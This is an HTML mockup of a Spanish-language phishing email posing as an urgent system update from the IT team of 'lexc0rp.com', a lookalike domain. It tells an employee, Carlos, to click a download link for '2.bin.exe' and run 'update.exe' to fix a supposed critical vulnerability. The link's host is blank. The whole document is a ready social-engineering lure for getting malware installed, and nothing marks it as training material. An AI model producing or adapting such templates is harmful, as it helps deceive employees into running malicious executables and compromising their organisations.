<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <title>Actualización Urgente del Sistema.</title>
     <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f5f5f5;
            margin: 0;
            padding: 0;
        }
        .container {
            max-width: 600px;
            margin: 0 auto;
            padding: 20px;
            background-color: #ffffff;
            border-radius: 5px;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
        }
        h1 {
            color: #333;
        }
        p {
            color: #666;
        }
        .button {
            display: inline-block;
            padding: 10px 20px;
            background-color: #007bff;
            color: #ffffff;
            text-decoration: none;
            border-radius: 3px;
        }
    </style>
     
</head>
<body>
    <div class="container">
        <h1>Actualización Urgente del Sistema</h1>
        <p>De: <strong>it-support@lexc0rp.com</strong></p>
        <p>Para: <strong>carlos_mendez@lexc0rp.com</strong></p>
        <p>Asunto: <strong>Actualización Urgente del Sistema</strong></p>
        <p>¡Hola Carlos! Hemos detectado una vulnerabilidad crítica en nuestros sistemas y necesitamos tu cooperación para poder solucionarla. Por favor, sigue las instrucciones a continuación para actualizar tu software de seguridad:</p>
        <ol>
            <li>Haz clic en el enlace de descarga: <a href="https://.com/2.bin.exe" class="button">Descargar Actualización</a></li>
            <br>
            <li>Luego de descargar el archivo, abrí el archivo "update.exe" para iniciar la actualización del sistema.</li>
            <br>
           <li>Unavez instalada la actualización, reinicia tu máquina para poder aplicar todos los cambios.</li>
        </ol>
        <br>
        <p>Tu colaboración es muy importante para mantener a nuestros sistemas seguros.</p>
        <br>
        <p>Atentamente,<br>El Equipo de IT.</p>
    </div>
</body>
</html>
